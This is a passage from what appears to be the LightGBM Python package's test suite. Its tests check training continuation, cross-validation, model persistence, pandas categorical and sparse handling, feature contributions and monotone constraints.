    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'boosting_type': 'dart',
        'objective': 'regression',
        'metric': 'l1',
        'verbose': -1
    }
    train_set = lgb.Dataset(X_train, y_train, free_raw_data=False)
    valid_set = lgb.Dataset(X_test, y_test, reference=train_set, free_raw_data=False)
    first_booster = lgb.train(params, train_set, num_boost_round=50)
    evals_result = {}
    booster = lgb.train(params, train_set,
                        num_boost_round=50,
                        valid_sets=valid_set,
                        verbose_eval=False,
                        evals_result=evals_result,
                        init_model=first_booster)
    error = mean_absolute_error(y_test, booster.predict(X_test))
    assert error < 2.0
    assert evals_result['valid_0']['l1'][-1] == pytest.approx(error)
def test_continue_train_multiclass():
    """Multiclass training should support resuming from an in-memory Booster."""
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'multiclass',
        'metric': 'multi_logloss',
        'num_class': 3,
        'verbose': -1
    }
    train_set = lgb.Dataset(X_train, y_train, params=params, free_raw_data=False)
    valid_set = lgb.Dataset(X_test, y_test, reference=train_set, params=params, free_raw_data=False)
    first_booster = lgb.train(params, train_set, num_boost_round=20)
    evals_result = {}
    booster = lgb.train(params, train_set,
                        num_boost_round=30,
                        valid_sets=valid_set,
                        verbose_eval=False,
                        evals_result=evals_result,
                        init_model=first_booster)
    loss = multi_logloss(y_test, booster.predict(X_test))
    assert loss < 0.1
    assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(loss)
def test_cv():
    """Smoke-test lgb.cv: metric overrides, shuffling, callbacks,
    eval_train_metric, custom folds (both a fold generator and a splitter
    object), and lambdarank with l2 and default NDCG metrics.
    """
    X_train, y_train = load_boston(return_X_y=True)
    params = {'verbose': -1}
    lgb_train = lgb.Dataset(X_train, y_train)
    # shuffle = False, override metric in params
    params_with_metric = {'metric': 'l2', 'verbose': -1}
    cv_res = lgb.cv(params_with_metric, lgb_train, num_boost_round=10,
                    nfold=3, stratified=False, shuffle=False,
                    metrics='l1', verbose_eval=False)
    assert 'l1-mean' in cv_res
    assert 'l2-mean' not in cv_res  # the metrics argument wins over params['metric']
    assert len(cv_res['l1-mean']) == 10
    # shuffle = True, callbacks
    cv_res = lgb.cv(params, lgb_train, num_boost_round=10, nfold=3, stratified=False, shuffle=True,
                    metrics='l1', verbose_eval=False,
                    callbacks=[lgb.reset_parameter(learning_rate=lambda i: 0.1 - 0.001 * i)])
    assert 'l1-mean' in cv_res
    assert len(cv_res['l1-mean']) == 10
    # enable display training loss
    cv_res = lgb.cv(params_with_metric, lgb_train, num_boost_round=10,
                    nfold=3, stratified=False, shuffle=False,
                    metrics='l1', verbose_eval=False, eval_train_metric=True)
    assert 'train l1-mean' in cv_res
    assert 'valid l1-mean' in cv_res
    assert 'train l2-mean' not in cv_res
    assert 'valid l2-mean' not in cv_res
    assert len(cv_res['train l1-mean']) == 10
    assert len(cv_res['valid l1-mean']) == 10
    # self defined folds
    tss = TimeSeriesSplit(3)
    folds = tss.split(X_train)
    # passing the generator and passing the splitter object must be equivalent
    cv_res_gen = lgb.cv(params_with_metric, lgb_train, num_boost_round=10, folds=folds,
                        verbose_eval=False)
    cv_res_obj = lgb.cv(params_with_metric, lgb_train, num_boost_round=10, folds=tss,
                        verbose_eval=False)
    np.testing.assert_allclose(cv_res_gen['l2-mean'], cv_res_obj['l2-mean'])
    # LambdaRank
    rank_example_dir = Path(__file__).absolute().parents[2] / 'examples' / 'lambdarank'
    X_train, y_train = load_svmlight_file(str(rank_example_dir / 'rank.train'))
    q_train = np.loadtxt(str(rank_example_dir / 'rank.train.query'))
    params_lambdarank = {'objective': 'lambdarank', 'verbose': -1, 'eval_at': 3}
    lgb_train = lgb.Dataset(X_train, y_train, group=q_train)
    # ... with l2 metric
    cv_res_lambda = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10, nfold=3,
                           metrics='l2', verbose_eval=False)
    assert len(cv_res_lambda) == 2
    assert not np.isnan(cv_res_lambda['l2-mean']).any()
    # ... with NDCG (default) metric
    cv_res_lambda = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10, nfold=3,
                           verbose_eval=False)
    assert len(cv_res_lambda) == 2
    assert not np.isnan(cv_res_lambda['ndcg@3-mean']).any()
    # self defined folds with lambdarank
    cv_res_lambda_obj = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10,
                               folds=GroupKFold(n_splits=3),
                               verbose_eval=False)
    np.testing.assert_allclose(cv_res_lambda['ndcg@3-mean'], cv_res_lambda_obj['ndcg@3-mean'])
def test_cvbooster():
    """lgb.cv(return_cvbooster=True) should expose per-fold boosters for prediction."""
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1,
    }
    train_set = lgb.Dataset(X_train, y_train)

    # With early stopping the CVBooster records a positive best iteration.
    cv_res = lgb.cv(params, train_set,
                    num_boost_round=25,
                    early_stopping_rounds=5,
                    verbose_eval=False,
                    nfold=3,
                    return_cvbooster=True)
    assert 'cvbooster' in cv_res
    cvbooster = cv_res['cvbooster']
    assert isinstance(cvbooster, lgb.CVBooster)
    assert isinstance(cvbooster.boosters, list)
    assert len(cvbooster.boosters) == 3
    assert all(isinstance(fold_booster, lgb.Booster) for fold_booster in cvbooster.boosters)
    assert cvbooster.best_iteration > 0

    # Predict with each fold's booster, then ensemble by averaging the folds.
    fold_preds = cvbooster.predict(X_test, num_iteration=cvbooster.best_iteration)
    assert isinstance(fold_preds, list)
    assert len(fold_preds) == 3
    ensemble_pred = np.mean(fold_preds, axis=0)
    loss = log_loss(y_test, ensemble_pred)
    assert loss < 0.13

    # Without early stopping best_iteration stays at its -1 sentinel.
    cv_res = lgb.cv(params, train_set,
                    num_boost_round=20,
                    verbose_eval=False,
                    nfold=3,
                    return_cvbooster=True)
    cvbooster = cv_res['cvbooster']
    assert cvbooster.best_iteration == -1
    fold_preds = cvbooster.predict(X_test)
    ensemble_pred = np.mean(fold_preds, axis=0)
    loss = log_loss(y_test, ensemble_pred)
    assert loss < 0.15
def test_feature_name():
    """Custom feature names should round-trip through training."""
    X_train, y_train = load_boston(return_X_y=True)
    params = {'verbose': -1}
    train_set = lgb.Dataset(X_train, y_train)
    feature_names = [f'f_{i}' for i in range(X_train.shape[-1])]
    booster = lgb.train(params, train_set, num_boost_round=5, feature_name=feature_names)
    assert feature_names == booster.feature_name()
    # test feature_names with whitespaces: the stored names come back with
    # underscores, i.e. equal to the original underscore-style names
    feature_names_with_space = [f'f {i}' for i in range(X_train.shape[-1])]
    booster = lgb.train(params, train_set, num_boost_round=5, feature_name=feature_names_with_space)
    assert feature_names == booster.feature_name()
def test_feature_name_with_non_ascii():
    """Non-ASCII feature names must survive a save/load round trip."""
    X_train = np.random.normal(size=(100, 4))
    y_train = np.random.random(100)
    # This has non-ascii strings.
    feature_names = [u'F_零', u'F_一', u'F_二', u'F_三']
    params = {'verbose': -1}
    train_set = lgb.Dataset(X_train, y_train)
    booster = lgb.train(params, train_set, num_boost_round=5, feature_name=feature_names)
    assert feature_names == booster.feature_name()
    booster.save_model('lgb.model')
    reloaded_booster = lgb.Booster(model_file='lgb.model')
    assert feature_names == reloaded_booster.feature_name()
def test_save_load_copy_pickle():
    """Continuing training must give identical results regardless of how the
    init model is provided: file path, loaded Booster, copy.copy,
    copy.deepcopy, or pickle (file-based and in-memory round trips).
    """
    def train_and_predict(init_model=None, return_model=False):
        # Train 10 rounds (optionally continuing from init_model) and either
        # return the booster itself or its test-set MSE.
        X, y = load_boston(return_X_y=True)
        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
        params = {
            'objective': 'regression',
            'metric': 'l2',
            'verbose': -1
        }
        lgb_train = lgb.Dataset(X_train, y_train)
        gbm_template = lgb.train(params, lgb_train, num_boost_round=10, init_model=init_model)
        return gbm_template if return_model else mean_squared_error(y_test, gbm_template.predict(X_test))
    gbm = train_and_predict(return_model=True)
    # reference result: continue directly from the in-memory booster
    ret_origin = train_and_predict(init_model=gbm)
    other_ret = []
    gbm.save_model('lgb.model')
    with open('lgb.model') as f:  # check all params are logged into model file correctly
        assert f.read().find("[num_iterations: 10]") != -1
    other_ret.append(train_and_predict(init_model='lgb.model'))
    gbm_load = lgb.Booster(model_file='lgb.model')
    other_ret.append(train_and_predict(init_model=gbm_load))
    other_ret.append(train_and_predict(init_model=copy.copy(gbm)))
    other_ret.append(train_and_predict(init_model=copy.deepcopy(gbm)))
    with open('lgb.pkl', 'wb') as f:
        pickle.dump(gbm, f)
    with open('lgb.pkl', 'rb') as f:
        gbm_pickle = pickle.load(f)
    other_ret.append(train_and_predict(init_model=gbm_pickle))
    gbm_pickles = pickle.loads(pickle.dumps(gbm))
    other_ret.append(train_and_predict(init_model=gbm_pickles))
    # every continuation path must match the reference continuation
    for ret in other_ret:
        assert ret_origin == pytest.approx(ret)
def test_pandas_categorical():
    """Exercise pandas categorical handling end to end.

    Trains with ``categorical_feature`` given as 'auto', by index, by name,
    by full name list, and as an empty list; checks that model save/load and
    model_to_string/model_from_string preserve predictions; and verifies
    ``pandas_categorical`` category values are stored identically on every
    booster.  The statement order matters: data is generated with a fixed
    seed and sequential np.random calls.
    """
    pd = pytest.importorskip("pandas")
    np.random.seed(42)  # sometimes there is no difference how cols are treated (cat or not cat)
    X = pd.DataFrame({"A": np.random.permutation(['a', 'b', 'c', 'd'] * 75),  # str
                      "B": np.random.permutation([1, 2, 3] * 100),  # int
                      "C": np.random.permutation([0.1, 0.2, -0.1, -0.1, 0.2] * 60),  # float
                      "D": np.random.permutation([True, False] * 150),  # bool
                      "E": pd.Categorical(np.random.permutation(['z', 'y', 'x', 'w', 'v'] * 60),
                                          ordered=True)})  # str and ordered categorical
    y = np.random.permutation([0, 1] * 150)
    X_test = pd.DataFrame({"A": np.random.permutation(['a', 'b', 'e'] * 20),  # unseen category
                           "B": np.random.permutation([1, 3] * 30),
                           "C": np.random.permutation([0.1, -0.1, 0.2, 0.2] * 15),
                           "D": np.random.permutation([True, False] * 30),
                           "E": pd.Categorical(np.random.permutation(['z', 'y'] * 30),
                                               ordered=True)})
    np.random.seed()  # reset seed
    cat_cols_actual = ["A", "B", "C", "D"]
    cat_cols_to_store = cat_cols_actual + ["E"]
    X[cat_cols_actual] = X[cat_cols_actual].astype('category')
    X_test[cat_cols_actual] = X_test[cat_cols_actual].astype('category')
    cat_values = [X[col].cat.categories.tolist() for col in cat_cols_to_store]
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1
    }
    lgb_train = lgb.Dataset(X, y)
    gbm0 = lgb.train(params, lgb_train, num_boost_round=10)
    pred0 = gbm0.predict(X_test)
    assert lgb_train.categorical_feature == 'auto'
    lgb_train = lgb.Dataset(X, pd.DataFrame(y))  # also test that label can be one-column pd.DataFrame
    gbm1 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=[0])
    pred1 = gbm1.predict(X_test)
    assert lgb_train.categorical_feature == [0]
    lgb_train = lgb.Dataset(X, pd.Series(y))  # also test that label can be pd.Series
    gbm2 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A'])
    pred2 = gbm2.predict(X_test)
    assert lgb_train.categorical_feature == ['A']
    lgb_train = lgb.Dataset(X, y)
    gbm3 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A', 'B', 'C', 'D'])
    pred3 = gbm3.predict(X_test)
    assert lgb_train.categorical_feature == ['A', 'B', 'C', 'D']
    # persistence via file, model string, and Booster(model_str=...) must all
    # reproduce gbm3's predictions
    gbm3.save_model('categorical.model')
    gbm4 = lgb.Booster(model_file='categorical.model')
    pred4 = gbm4.predict(X_test)
    model_str = gbm4.model_to_string()
    gbm4.model_from_string(model_str, False)
    pred5 = gbm4.predict(X_test)
    gbm5 = lgb.Booster(model_str=model_str)
    pred6 = gbm5.predict(X_test)
    lgb_train = lgb.Dataset(X, y)
    gbm6 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A', 'B', 'C', 'D', 'E'])
    pred7 = gbm6.predict(X_test)
    assert lgb_train.categorical_feature == ['A', 'B', 'C', 'D', 'E']
    lgb_train = lgb.Dataset(X, y)
    gbm7 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=[])
    pred8 = gbm7.predict(X_test)
    assert lgb_train.categorical_feature == []
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(pred0, pred1)
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(pred0, pred2)
    np.testing.assert_allclose(pred1, pred2)
    np.testing.assert_allclose(pred0, pred3)
    np.testing.assert_allclose(pred0, pred4)
    np.testing.assert_allclose(pred0, pred5)
    np.testing.assert_allclose(pred0, pred6)
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(pred0, pred7)  # ordered cat features aren't treated as cat features by default
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(pred0, pred8)
    # every booster must have stored the same pandas category values
    assert gbm0.pandas_categorical == cat_values
    assert gbm1.pandas_categorical == cat_values
    assert gbm2.pandas_categorical == cat_values
    assert gbm3.pandas_categorical == cat_values
    assert gbm4.pandas_categorical == cat_values
    assert gbm5.pandas_categorical == cat_values
    assert gbm6.pandas_categorical == cat_values
    assert gbm7.pandas_categorical == cat_values
def test_pandas_sparse():
    """Predictions for pandas SparseArray columns must match the dense versions."""
    pd = pytest.importorskip("pandas")
    try:
        from pandas.arrays import SparseArray
    except ImportError:  # support old versions
        from pandas import SparseArray
    X = pd.DataFrame({"A": SparseArray(np.random.permutation([0, 1, 2] * 100)),
                      "B": SparseArray(np.random.permutation([0.0, 0.1, 0.2, -0.1, 0.2] * 60)),
                      "C": SparseArray(np.random.permutation([True, False] * 150))})
    y = pd.Series(SparseArray(np.random.permutation([0, 1] * 150)))
    X_test = pd.DataFrame({"A": SparseArray(np.random.permutation([0, 2] * 30)),
                           "B": SparseArray(np.random.permutation([0.0, 0.1, 0.2, -0.1] * 15)),
                           "C": SparseArray(np.random.permutation([True, False] * 30))})
    if pd.__version__ >= '0.24.0':
        # the sparse-dtype check is only done on pandas versions that support it
        for dtype in pd.concat([X.dtypes, X_test.dtypes, pd.Series(y.dtypes)]):
            assert pd.api.types.is_sparse(dtype)
    params = {
        'objective': 'binary',
        'verbose': -1
    }
    lgb_train = lgb.Dataset(X, y)
    gbm = lgb.train(params, lgb_train, num_boost_round=10)
    pred_sparse = gbm.predict(X_test, raw_score=True)
    # densify through whichever API this pandas version offers
    if hasattr(X_test, 'sparse'):
        pred_dense = gbm.predict(X_test.sparse.to_dense(), raw_score=True)
    else:
        pred_dense = gbm.predict(X_test.to_dense(), raw_score=True)
    np.testing.assert_allclose(pred_sparse, pred_dense)
def test_reference_chain():
    """Chained Dataset.subset calls should still train and evaluate cleanly."""
    features = np.random.normal(size=(100, 2))
    labels = np.random.normal(size=100)
    base_data = lgb.Dataset(features, labels)
    # take subsets and train
    train_subset = base_data.subset(np.arange(80))
    valid_subset = base_data.subset(np.arange(80, 100)).subset(np.arange(18))
    params = {'objective': 'regression_l2', 'metric': 'rmse'}
    evals_result = {}
    lgb.train(params, train_subset, num_boost_round=20,
              valid_sets=[train_subset, valid_subset],
              verbose_eval=False, evals_result=evals_result)
    # both eval histories must cover all 20 rounds
    assert len(evals_result['training']['rmse']) == 20
    assert len(evals_result['valid_1']['rmse']) == 20
def test_contribs():
    """Feature contributions must sum to the raw score for every row."""
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1,
    }
    train_set = lgb.Dataset(X_train, y_train)
    booster = lgb.train(params, train_set, num_boost_round=20)
    raw_scores = booster.predict(X_test, raw_score=True)
    contrib_row_sums = np.sum(booster.predict(X_test, pred_contrib=True), axis=1)
    assert np.linalg.norm(raw_scores - contrib_row_sums) < 1e-4
def test_contribs_sparse():
    """pred_contrib on CSR/CSC input returns sparse output matching the dense path."""
    n_features = 20
    n_samples = 100
    # generate CSR sparse dataset
    X, y = make_multilabel_classification(n_samples=n_samples,
                                          sparse=True,
                                          n_features=n_features,
                                          n_classes=1,
                                          n_labels=2)
    y = y.flatten()
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'binary',
        'verbose': -1,
    }
    lgb_train = lgb.Dataset(X_train, y_train)
    gbm = lgb.train(params, lgb_train, num_boost_round=20)
    contribs_csr = gbm.predict(X_test, pred_contrib=True)
    # sparse input yields sparse contribution output of the same layout
    assert isspmatrix_csr(contribs_csr)
    # convert data to dense and get back same contribs
    contribs_dense = gbm.predict(X_test.toarray(), pred_contrib=True)
    # validate the values are the same
    if platform.machine() == 'aarch64':
        # looser tolerance on aarch64 — presumably FP differences; see upstream branch
        np.testing.assert_allclose(contribs_csr.toarray(), contribs_dense, rtol=1, atol=1e-12)
    else:
        np.testing.assert_allclose(contribs_csr.toarray(), contribs_dense)
    # per-row contributions must sum to the raw score
    assert (np.linalg.norm(gbm.predict(X_test, raw_score=True)
                           - np.sum(contribs_dense, axis=1)) < 1e-4)
    # validate using CSC matrix
    X_test_csc = X_test.tocsc()
    contribs_csc = gbm.predict(X_test_csc, pred_contrib=True)
    assert isspmatrix_csc(contribs_csc)
    # validate the values are the same
    if platform.machine() == 'aarch64':
        np.testing.assert_allclose(contribs_csc.toarray(), contribs_dense, rtol=1, atol=1e-12)
    else:
        np.testing.assert_allclose(contribs_csc.toarray(), contribs_dense)
def test_contribs_sparse_multiclass():
    """Multiclass pred_contrib on sparse input returns one sparse matrix per
    class, whose values match the dense prediction path."""
    n_features = 20
    n_samples = 100
    n_labels = 4
    # generate CSR sparse dataset
    X, y = make_multilabel_classification(n_samples=n_samples,
                                          sparse=True,
                                          n_features=n_features,
                                          n_classes=1,
                                          n_labels=n_labels)
    y = y.flatten()
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'multiclass',
        'num_class': n_labels,
        'verbose': -1,
    }
    lgb_train = lgb.Dataset(X_train, y_train)
    gbm = lgb.train(params, lgb_train, num_boost_round=20)
    contribs_csr = gbm.predict(X_test, pred_contrib=True)
    # multiclass sparse output is a list with one CSR matrix per class
    assert isinstance(contribs_csr, list)
    for perclass_contribs_csr in contribs_csr:
        assert isspmatrix_csr(perclass_contribs_csr)
    # convert data to dense and get back same contribs
    contribs_dense = gbm.predict(X_test.toarray(), pred_contrib=True)
    # validate the values are the same:
    # stack per-class matrices to (rows, classes, features+1), then flatten the
    # last two axes to match the dense output's (rows, classes*(features+1))
    contribs_csr_array = np.swapaxes(np.array([sparse_array.toarray() for sparse_array in contribs_csr]), 0, 1)
    contribs_csr_arr_re = contribs_csr_array.reshape((contribs_csr_array.shape[0],
                                                      contribs_csr_array.shape[1] * contribs_csr_array.shape[2]))
    if platform.machine() == 'aarch64':
        # looser tolerance on aarch64 — presumably FP differences; see upstream branch
        np.testing.assert_allclose(contribs_csr_arr_re, contribs_dense, rtol=1, atol=1e-12)
    else:
        np.testing.assert_allclose(contribs_csr_arr_re, contribs_dense)
    contribs_dense_re = contribs_dense.reshape(contribs_csr_array.shape)
    # per-row, per-class contributions must sum to the raw scores
    assert np.linalg.norm(gbm.predict(X_test, raw_score=True) - np.sum(contribs_dense_re, axis=2)) < 1e-4
    # validate using CSC matrix
    X_test_csc = X_test.tocsc()
    contribs_csc = gbm.predict(X_test_csc, pred_contrib=True)
    assert isinstance(contribs_csc, list)
    for perclass_contribs_csc in contribs_csc:
        assert isspmatrix_csc(perclass_contribs_csc)
    # validate the values are the same
    contribs_csc_array = np.swapaxes(np.array([sparse_array.toarray() for sparse_array in contribs_csc]), 0, 1)
    contribs_csc_array = contribs_csc_array.reshape((contribs_csc_array.shape[0],
                                                     contribs_csc_array.shape[1] * contribs_csc_array.shape[2]))
    if platform.machine() == 'aarch64':
        np.testing.assert_allclose(contribs_csc_array, contribs_dense, rtol=1, atol=1e-12)
    else:
        np.testing.assert_allclose(contribs_csc_array, contribs_dense)
@pytest.mark.skipif(psutil.virtual_memory().available / 1024 / 1024 / 1024 < 3, reason='not enough RAM')
def test_int32_max_sparse_contribs():
    """pred_contrib on a very tall sparse matrix must keep the correct shape.

    Per the test name, the 3M-row input exercises contribution outputs whose
    size goes beyond int32 index range — TODO confirm against the C++ side.
    """
    params = {
        'objective': 'binary'
    }
    train_features = np.random.rand(100, 1000)
    train_targets = [0] * 50 + [1] * 50
    lgb_train = lgb.Dataset(train_features, train_targets)
    gbm = lgb.train(params, lgb_train, num_boost_round=2)
    csr_input_shape = (3000000, 1000)
    test_features = csr_matrix(csr_input_shape)
    # scatter a few nonzeros so the matrix is not completely empty
    for i in range(0, csr_input_shape[0], csr_input_shape[0] // 6):
        for j in range(0, 1000, 100):
            test_features[i, j] = random.random()
    y_pred_csr = gbm.predict(test_features, pred_contrib=True)
    # Note there is an extra column added to the output for the expected value
    csr_output_shape = (csr_input_shape[0], csr_input_shape[1] + 1)
    assert y_pred_csr.shape == csr_output_shape
    y_pred_csc = gbm.predict(test_features.tocsc(), pred_contrib=True)
    # Note output CSC shape should be same as CSR output shape
    assert y_pred_csc.shape == csr_output_shape
def test_sliced_data():
    """Training on sliced views (labels, 2-D arrays, CSR) must match training
    on the equivalent contiguous data."""
    def train_and_get_predictions(features, labels):
        # train a small binary model and return its in-sample predictions
        dataset = lgb.Dataset(features, label=labels)
        lgb_params = {
            'application': 'binary',
            'verbose': -1,
            'min_data': 5,
        }
        gbm = lgb.train(
            params=lgb_params,
            train_set=dataset,
            num_boost_round=10,
        )
        return gbm.predict(features)
    num_samples = 100
    features = np.random.rand(num_samples, 5)
    positive_samples = int(num_samples * 0.25)
    labels = np.append(np.ones(positive_samples, dtype=np.float32),
                       np.zeros(num_samples - positive_samples, dtype=np.float32))
    # test sliced labels
    origin_pred = train_and_get_predictions(features, labels)
    stacked_labels = np.column_stack((labels, np.ones(num_samples, dtype=np.float32)))
    sliced_labels = stacked_labels[:, 0]
    sliced_pred = train_and_get_predictions(features, sliced_labels)
    np.testing.assert_allclose(origin_pred, sliced_pred)
    # append some columns
    stacked_features = np.column_stack((np.ones(num_samples, dtype=np.float32), features))
    stacked_features = np.column_stack((np.ones(num_samples, dtype=np.float32), stacked_features))
    stacked_features = np.column_stack((stacked_features, np.ones(num_samples, dtype=np.float32)))
    stacked_features = np.column_stack((stacked_features, np.ones(num_samples, dtype=np.float32)))
    # append some rows
    stacked_features = np.concatenate((np.ones(9, dtype=np.float32).reshape((1, 9)), stacked_features), axis=0)
    stacked_features = np.concatenate((np.ones(9, dtype=np.float32).reshape((1, 9)), stacked_features), axis=0)
    stacked_features = np.concatenate((stacked_features, np.ones(9, dtype=np.float32).reshape((1, 9))), axis=0)
    stacked_features = np.concatenate((stacked_features, np.ones(9, dtype=np.float32).reshape((1, 9))), axis=0)
    # test sliced 2d matrix: carve the original data back out of the padding
    sliced_features = stacked_features[2:102, 2:7]
    assert np.all(sliced_features == features)
    sliced_pred = train_and_get_predictions(sliced_features, sliced_labels)
    np.testing.assert_allclose(origin_pred, sliced_pred)
    # test sliced CSR
    stacked_csr = csr_matrix(stacked_features)
    sliced_csr = stacked_csr[2:102, 2:7]
    assert np.all(sliced_csr == features)
    sliced_pred = train_and_get_predictions(sliced_csr, sliced_labels)
    np.testing.assert_allclose(origin_pred, sliced_pred)
def test_init_with_subset():
    """Continue training across Dataset subsets.

    In-memory datasets support subset-to-subset continuation; file-backed
    (binary) datasets raise "Unknown format of training data" when used the
    same way, and their ``get_data()`` returns the file path.
    """
    data = np.random.random((50, 2))
    y = [1] * 25 + [0] * 25
    lgb_train = lgb.Dataset(data, y, free_raw_data=False)
    subset_index_1 = np.random.choice(np.arange(50), 30, replace=False)
    subset_data_1 = lgb_train.subset(subset_index_1)
    subset_index_2 = np.random.choice(np.arange(50), 20, replace=False)
    subset_data_2 = lgb_train.subset(subset_index_2)
    params = {
        'objective': 'binary',
        'verbose': -1
    }
    init_gbm = lgb.train(params=params,
                         train_set=subset_data_1,
                         num_boost_round=10,
                         keep_training_booster=True)
    lgb.train(params=params,
              train_set=subset_data_2,
              num_boost_round=10,
              init_model=init_gbm)
    # subsets keep views of the raw data with the expected row counts
    assert lgb_train.get_data().shape[0] == 50
    assert subset_data_1.get_data().shape[0] == 30
    assert subset_data_2.get_data().shape[0] == 20
    # now repeat via a saved binary dataset file
    lgb_train.save_binary("lgb_train_data.bin")
    lgb_train_from_file = lgb.Dataset('lgb_train_data.bin', free_raw_data=False)
    subset_data_3 = lgb_train_from_file.subset(subset_index_1)
    subset_data_4 = lgb_train_from_file.subset(subset_index_2)
    init_gbm_2 = lgb.train(params=params,
                           train_set=subset_data_3,
                           num_boost_round=10,
                           keep_training_booster=True)
    with np.testing.assert_raises_regex(lgb.basic.LightGBMError, "Unknown format of training data"):
        lgb.train(params=params,
                  train_set=subset_data_4,
                  num_boost_round=10,
                  init_model=init_gbm_2)
    # file-backed datasets report the file path as their data
    assert lgb_train_from_file.get_data() == "lgb_train_data.bin"
    assert subset_data_3.get_data() == "lgb_train_data.bin"
    assert subset_data_4.get_data() == "lgb_train_data.bin"
def generate_trainset_for_monotone_constraints_tests(x3_to_category=True):
    """Build a synthetic Dataset for the monotone-constraints tests.

    Feature 0 is positively correlated with the target, features 1 and 2
    negatively; feature 2 is optionally bucketed into categories via
    `categorize` and declared categorical on the Dataset.
    """
    n_samples = 3000
    x1 = np.random.random(size=n_samples)  # positively correlated with y
    x2 = np.random.random(size=n_samples)  # negatively correlated with y
    x3 = np.random.random(size=n_samples)  # negatively correlated with y
    third_column = categorize(x3) if x3_to_category else x3
    x = np.column_stack((x1, x2, third_column))
    noise = np.random.normal(loc=0.0, scale=0.01, size=n_samples)
    scales = 10. * (np.random.random(6) + 0.5)
    # Monotone trends plus bounded oscillations, so the monotone signal
    # dominates but is not trivially linear.
    y = (scales[0] * x1
         + np.sin(scales[1] * np.pi * x1)
         - scales[2] * x2
         - np.cos(scales[3] * np.pi * x2)
         - scales[4] * x3
         - np.cos(scales[5] * np.pi * x3)
         + noise)
    categorical_features = [2] if x3_to_category else []
    return lgb.Dataset(x, label=y, categorical_feature=categorical_features,
                       free_raw_data=False)
@pytest.mark.parametrize("test_with_categorical_variable", [True, False])
def test_monotone_constraints(test_with_categorical_variable):
    """Check that monotone constraints hold for every constraints method,
    and that interaction constraints are still enforced when combined.

    Feature 0 is constrained increasing, feature 1 decreasing, and
    feature 2 (optionally categorical) is unconstrained.
    """
    def is_increasing(y):
        return (np.diff(y) >= 0.0).all()

    def is_decreasing(y):
        return (np.diff(y) <= 0.0).all()

    def is_non_monotone(y):
        return (np.diff(y) < 0.0).any() and (np.diff(y) > 0.0).any()

    def is_correctly_constrained(learner, x3_to_category=True):
        # Sweep one feature over [0, 1] while holding the other two fixed
        # at several values, and check the direction of the predictions.
        iterations = 10
        n = 1000
        variable_x = np.linspace(0, 1, n).reshape((n, 1))
        fixed_xs_values = np.linspace(0, 1, n)
        for i in range(iterations):
            fixed_x = fixed_xs_values[i] * np.ones((n, 1))
            monotonically_increasing_x = np.column_stack((variable_x, fixed_x, fixed_x))
            monotonically_increasing_y = learner.predict(monotonically_increasing_x)
            monotonically_decreasing_x = np.column_stack((fixed_x, variable_x, fixed_x))
            monotonically_decreasing_y = learner.predict(monotonically_decreasing_x)
            non_monotone_x = np.column_stack(
                (
                    fixed_x,
                    fixed_x,
                    categorize(variable_x) if x3_to_category else variable_x,
                )
            )
            non_monotone_y = learner.predict(non_monotone_x)
            if not (
                is_increasing(monotonically_increasing_y)
                and is_decreasing(monotonically_decreasing_y)
                and is_non_monotone(non_monotone_y)
            ):
                return False
        return True

    def are_interactions_enforced(gbm, feature_sets):
        def parse_tree_features(gbm):
            # trees start at position 1.
            tree_str = gbm.model_to_string().split("Tree")[1:]
            feature_sets = []
            for tree in tree_str:
                # split_features are in 4th line.
                features = tree.splitlines()[3].split("=")[1].split(" ")
                features = set(f"Column_{f}" for f in features)
                feature_sets.append(features)
            return np.array(feature_sets)

        def has_interaction(treef):
            # A tree "interacts" if its split features span more than one
            # of the allowed feature sets.
            n = 0
            for fs in feature_sets:
                if len(treef.intersection(fs)) > 0:
                    n += 1
            return n > 1

        tree_features = parse_tree_features(gbm)
        has_interaction_flag = np.array(
            [has_interaction(treef) for treef in tree_features]
        )
        return not has_interaction_flag.any()

    trainset = generate_trainset_for_monotone_constraints_tests(
        test_with_categorical_variable
    )
    for test_with_interaction_constraints in [True, False]:
        error_msg = ("Model not correctly constrained "
                     f"(test_with_interaction_constraints={test_with_interaction_constraints})")
        for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
            params = {
                "min_data": 20,
                "num_leaves": 20,
                "monotone_constraints": [1, -1, 0],
                "monotone_constraints_method": monotone_constraints_method,
                "use_missing": False,
            }
            if test_with_interaction_constraints:
                params["interaction_constraints"] = [[0], [1], [2]]
            constrained_model = lgb.train(params, trainset)
            assert is_correctly_constrained(
                constrained_model, test_with_categorical_variable
            ), error_msg
            if test_with_interaction_constraints:
                # BUG FIX: the last entry used to be the bare string
                # "Column_2"; set.intersection then iterated its
                # characters, so the third constraint group never matched
                # and trees splitting on Column_2 were silently ignored.
                feature_sets = [["Column_0"], ["Column_1"], ["Column_2"]]
                assert are_interactions_enforced(constrained_model, feature_sets)
def test_monotone_penalty():
    """A monotone-splits penalty of p must forbid splits on constrained
    features in the first int(p) levels of every tree, while still
    allowing them deeper down."""
    def no_monotone_splits_above(node, depth_left, constraints):
